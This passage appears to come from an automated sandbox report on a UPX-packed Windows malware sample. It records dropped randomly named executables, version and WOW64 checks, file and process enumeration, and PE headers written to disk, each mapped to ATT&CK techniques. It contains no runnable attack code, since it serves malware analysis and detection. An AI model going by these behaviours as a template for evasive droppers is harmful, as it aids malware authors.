type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffpfpp.exe]- [targetUID: 00000000-00006020]\n \"vjdhtlv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjdhtlv.exe]- [targetUID: 00000000-00003732]\n \"llrlrrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llrlrrb.exe]- [targetUID: 00000000-00004304]\n \"hrbbfnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrbbfnh.exe]- [targetUID: 00000000-00006028]\n \"xpldnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xpldnr.exe]- [targetUID: 00000000-00006000]\n \"tbbdbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbbdbn.exe]- [targetUID: 00000000-00006000]\n \"nrhhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrhhv.exe]- [targetUID: 00000000-00006120]\n \"jfdjvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jfdjvd.exe]- [targetUID: 00000000-00004268]\n \"04284.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04284.exe]- [targetUID: 00000000-00006096]\n \"464446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\464446.exe]- [targetUID: 00000000-00006096]\n \"rbffv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rbffv.exe]- [targetUID: 00000000-00005780]\n \"jbdtnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbdtnd.exe]- [targetUID: 00000000-00005756]\n \"nxhlxrp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxhlxrp.exe]- [targetUID: 00000000-00005764]\n \"628008.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\628008.exe]- [targetUID: 00000000-00005764]\n \"064260.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\064260.exe]- [targetUID: 00000000-00005984]\n \"tfxnptb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfxnptb.exe]- [targetUID: 00000000-00005800]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"IsWow64Process\" with parameter \"5800\" - (UID: 00000000-00005800)\n \"tfxnptb.exe\" called \"IsWow64Process\" with parameter \"5984\" - (UID: 00000000-00005984)\n \"628008.exe\" called \"IsWow64Process\" with parameter \"5764\" - (UID: 00000000-00005764)\n \"nxhlxrp.exe\" called \"IsWow64Process\" with parameter \"5776\" - (UID: 00000000-00005776)\n \"jbdtnd.exe\" called \"IsWow64Process\" with parameter \"5756\" - (UID: 00000000-00005756)\n \"rbffv.exe\" called \"IsWow64Process\" with parameter \"5780\" - (UID: 00000000-00005780)\n \"jfdjvd.exe\" called \"IsWow64Process\" with parameter \"6124\" - (UID: 00000000-00006124)\n \"nrhhv.exe\" called \"IsWow64Process\" with parameter \"6120\" - (UID: 00000000-00006120)\n \"tbbdbn.exe\" called \"IsWow64Process\" with parameter \"6000\" - (UID: 00000000-00006000)\n \"ffpfpp.exe\" called \"IsWow64Process\" with parameter \"6020\" - (UID: 00000000-00006020)\n \"00688.exe\" called \"IsWow64Process\" with parameter \"3708\" - (UID: 00000000-00003708)\n \"8644820.exe\" called \"IsWow64Process\" with parameter \"772\" - (UID: 00000000-00000772)\n \"ldnfnvr.exe\" called \"IsWow64Process\" with parameter \"1904\" - (UID: 00000000-00001904)\n \"jnnjf.exe\" called \"IsWow64Process\" with parameter \"1896\" - (UID: 00000000-00001896)\n \"rbppd.exe\" called \"IsWow64Process\" with parameter \"3840\" - (UID: 00000000-00003840)\n \"6824004.exe\" called \"IsWow64Process\" with parameter \"1908\" - (UID: 00000000-00001908)\n \"dnhpbvd.exe\" called \"IsWow64Process\" with parameter \"2256\" - (UID: 00000000-00002256)\n \"fxlrjhd.exe\" called \"IsWow64Process\" with parameter \"2076\" - (UID: 00000000-00002076)\n \"fxxdb.exe\" called \"IsWow64Process\" with parameter \"2768\" - (UID: 00000000-00002768)\n \"482088.exe\" called \"IsWow64Process\" with parameter \"3256\" - (UID: 00000000-00003256)\n \"lpnpn.exe\" called \"IsWow64Process\" with parameter \"2888\" - (UID: 00000000-00002888)\n \"dnjtl.exe\" called \"IsWow64Process\" with parameter \"3972\" - (UID: 00000000-00003972)\n \"lvdfpxj.exe\" called \"IsWow64Process\" with parameter \"4432\" - (UID: 00000000-00004432)\n \"jnbhhn.exe\" called \"IsWow64Process\" with parameter \"1740\" - (UID: 00000000-00001740)\n \"hnndln.exe\" called \"IsWow64Process\" with parameter \"1708\" - (UID: 00000000-00001708)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700f0b32700ebb32700000000000000000000002000000000011ce312000000000080f0120095e165778e0f1700feffffff435c697750596977aa000000b8000000eab32700e8b32700a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000020001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed697712b42700a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f7512b42700a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005800)\n \"tfxnptb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002800d8272800d3272800000000000000000000002000000000011ce312000000000080f0120095e16577260c1700feffffff435c697750596977aa000000b8000000d2272800d0272800a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6977fa272800a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f75fa272800a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005984)\n \"064260.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003700e02e3700db2e3700000000000000000000002f00000000011ce312000000000080f0120095e16577a6311700feffffff435c697750596977aa000000b8000000da2e3700d82e3700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6977022f3700a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f75022f3700a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00006008)\n \"064260.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006008)\n \"628008.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005764)\n \"628008.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00d8b21f00d3b21f00000000000000000000001800000000011ce312000000000080f0120095e16577a0301700feffffff435c697750596977aa000000b8000000d2b21f00d0b21f00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000018001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6977fab21f00a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f75fab21f00a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00005764)\n \"628008.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005764)\n \"nxhlxrp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005776)\n \"nxhlxrp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d0060ae2d005bae2d00000000000000000000002600000000011ce312000000000080f0120095e1657761361700feffffff435c697750596977aa000000b80000005aae2d0058ae2d00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000026001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed697782ae2d00a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f7582ae2d00a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00005776)\n \"nxhlxrp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005776)\n \"jbdtnd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"jbdtnd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002e00582e2e00532e2e00000000000000000000002600000000011ce312000000000080f0120095e1657750391700feffffff435c697750596977aa000000b8000000522e2e00502e2e00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000026001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed69777a2e2e00a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f757a2e2e00a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00005756)\n \"jbdtnd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005756)\n \"rbffv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005780)\n \"rbffv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000280068ae280063ae2800000000000000000000002100000000011ce312000000000080f0120095e16577ae3e1700feffffff435c697750596977aa000000b800000062ae280060ae2800a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed69778aae2800a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f758aae2800a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00005780)\n \"rbffv.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005780)\n \"464446.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600c0312600bb312600000000000000000000001e00000000011ce312000000000080f0120095e16577bc211700feffffff435c697750596977aa000000b8000000ba312600b8312600a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6977e2312600a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f75e2312600a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00006096)\n \"464446.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"04284.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a00a82f6a00a32f6a00000000000000000000006200000000011ce312000000000080f0120095e1657746201700feffffff435c697750596977aa000000b8000000a22f6a00a02f6a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c687760d86c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed6977ca2f6a00a06a3f7586000000a4e41200dce812000000000086008800a06a3f75a4e41200916c3f75ca2f6a00a06a3f75a06a3f7514e9120002020000 (UID: 00000000-00004268)\n \"04284.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004268)\n \"jfdjvd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006124)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter 24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter tfxnptb.exe (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005800)\n \"tfxnptb.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"FindNextFileW\" with parameter 064260.exe (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"FindNextFileW\" with parameter 24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe (UID: 00000000-00005984)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tfxnptb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"628008.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nxhlxrp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jbdtnd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rbffv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jfdjvd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nrhhv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tbbdbn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ffpfpp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"00688.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8644820.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ldnfnvr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jnnjf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rbppd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6824004.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dnhpbvd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fxlrjhd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fxxdb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"482088.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lpnpn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dnjtl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lvdfpxj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jnbhhn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hnndln.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has an entrypoint in section \"UPX1\"\n \"vhxrtdt.exe\" has an entrypoint in section \"UPX1\"\n \"bdnnt.exe\" has an entrypoint in section \"UPX1\"\n \"pfdblvl.exe\" has an entrypoint in section \"UPX1\"\n \"bphhd.exe\" has an entrypoint in section \"UPX1\"\n \"jvrbx.exe\" has an entrypoint in section \"UPX1\"\n \"njvhn.exe\" has an entrypoint in section \"UPX1\"\n \"468866.exe\" has an entrypoint in section \"UPX1\"\n \"664842.exe\" has an entrypoint in section \"UPX1\"\n \"840664.exe\" has an entrypoint in section \"UPX1\"\n \"886680.exe\" has an entrypoint in section \"UPX1\"\n \"404286.exe\" has an entrypoint in section \"UPX1\"\n \"62664.exe\" has an entrypoint in section \"UPX1\"\n \"ftbltx.exe\" has an entrypoint in section \"UPX1\"\n \"xrfjx.exe\" has an entrypoint in section \"UPX1\"\n \"jnnxfl.exe\" has an entrypoint in section \"UPX1\"\n \"bjdlj.exe\" has an entrypoint in section \"UPX1\"\n \"njhpfx.exe\" has an entrypoint in section \"UPX1\"\n \"4824668.exe\" has an entrypoint in section \"UPX1\"\n \"66446.exe\" has an entrypoint in section \"UPX1\"\n \"00008.exe\" has an entrypoint in section \"UPX1\"\n \"rhxhth.exe\" has an entrypoint in section \"UPX1\"\n \"tdtflp.exe\" has an entrypoint in section \"UPX1\"\n \"nxfnfn.exe\" has an entrypoint in section \"UPX1\"\n \"rhnxdp.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" wrote 14343 bytes starting with PE header signature to file \"C:\\tfxnptb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tfxnptb.exe\" wrote 14357 bytes starting with PE header signature to file \"C:\\064260.exe\": 